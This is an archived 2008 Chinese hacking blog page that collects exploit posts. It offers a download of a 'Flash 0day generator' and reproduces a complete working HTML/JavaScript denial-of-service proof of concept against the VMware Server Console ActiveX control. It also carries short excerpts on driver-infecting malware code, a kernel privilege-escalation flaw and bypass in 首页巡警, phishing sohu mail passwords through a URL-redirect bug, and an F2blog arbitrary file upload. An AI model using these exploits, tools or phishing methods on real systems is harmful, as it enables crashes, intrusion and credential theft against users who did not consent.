2008年5月 的日志

Flash 0day生成器

2008/05/29 20:51 | 鬼仔 | 工具收集 | 14 个回复

鬼仔:也就是这个了,open写的。

下载地址:flash0day.rar

Tags: , , , ,

VMware Server Console ActiveX DOS POC

2008/05/29 14:37 | 鬼仔 | 工具收集 | 2 个回复 
<html>
<title>VMware Server Console ActiveX DOS POC</title>
<!--
Author:Shennan Wang
blog:http://hi.baidu.com/nansec
stuff:http://www.d4rkn3t.cn
thanks:
Robinh00d,ayarei,void
-->
<head>
<script language="JavaScript">
    function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) { 
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}  
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
</head>
 <body onload="JavaScript: return test();">
<object classid="clsid:D2C53A29-B43A-4367-B808-52CE785BBF36" id="nansec">
</object>
 </body>
</html>

# milw0rm.com [2008-05-28]
Tags: , ,

完整的驱动感染.code.编译通过

2008/05/29 1:09 | 鬼仔 | 工具收集 | 消灭0回复

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:sudami

/*
* Module: InfectDriver.c
*
* Author : 老Y (源自kanxue,不过老Y放的code不完整,需要自己补充)
* Fixer : sudami [[email protected]]
* Time : 08/05/28
*
* Comment:
*
* 半年前一大牛在kanxue进行“驱动感染”扫盲,偶当时没搞明白.半年后突然想起来,于是
* 尝试学习下.由于偶太菜,弄了几个小半天.终于调试成功. 关键点在于计算驱动自身的
阅读全文 »

Tags: ,

首页巡警v1.2及以下版本 本地权限提升漏洞(任意内核地址写入)

2008/05/28 20:07 | 鬼仔 | 技术文章 | 消灭0回复

作者:MJ0011
来源:MJ0011的内核驱动研究所

首页巡警v1.2及以下所有版本的IRP_MJ_DEVICE_CONTROL处理例程存在 任意内核地址写入漏洞

该处理例程有两处地方都存在任意地址写入漏洞,其中一处可利用做本地权限提升,可在任意权限用户下执行,并写入任意数据到任意内核地址。

引发错误的原因是首页巡警的驱动开发者未能正确理解i/o传输方式导致的。首页巡警所有的数据传递都是通过MOTHOD_BUFFERED的io control code来执行的,根据MSDN中描述:
阅读全文 »

Tags: ,

四行代码绕过首页巡警v1.2

2008/05/28 20:03 | 鬼仔 | 技术文章 | 消灭0回复

作者:MJ0011
来源:MJ0011的内核驱动研究所

首页巡警v1.2版加入了一个校验,在发送IRP_MJ_CREATE请求到其驱动时,会打开当前进程的 SectionObject->SegmentObject->BaseAddress->FileObject,并打开进程文件进行 校验,若不是IeGuard的话,就拒绝操作其驱动

不过,同样非常轻易可以绕过
阅读全文 »

Tags:

利用sohu网站URL跳转漏洞欺骗邮箱密码

2008/05/28 13:48 | 鬼仔 | 技术文章 | 2 个回复

作者:空虚浪子心[XGC]
来源:IT168安全频道

一、url跳转漏洞遍布各大网站

【IT168专稿】url跳转漏洞遍布各大网站,简单看一下,THE9、sohu等居然都存在这个漏洞!我们就拿sohu为例,讲一下该漏洞。来到 sohu的用户注册页面,可以看到,在IE地址栏里,默认写着http://passport.sohu.com/web /signup.jsp?appid=1000&ru=http://login.mail.sohu.com/reg /signup_success.jsp。
阅读全文 »

Tags:

flash的一个tips

2008/05/27 21:28 | 鬼仔 | 技术文章 | 4 个回复

作者:darkne2s
来源:大能寺

好像大牛些都有flash exp了.不过10个人有9个人说不好用。这出乎我的意料。按道理说这个不是人的漏洞应该很好用才是。而且我也经常不定期的收集世界各地的user agent和OS,activex情况.
flash我搜集的情况是超过300台的机器里面在使用flash9-9e的winxp有超过90%.
阅读全文 »

Tags: ,

F2blog XMLRPC 上传任意文件漏洞

2008/05/27 15:46 | 鬼仔 | 工具收集 | 消灭0回复

By:Maple-x[B.C.T]
Site:http://www.neeao.com
Date:2008-5-27

刚从官方下载的最新版:F2blog-v1.2_build_03.01_full

存在漏洞文件:xmlrpc.php
阅读全文 »

Tags: ,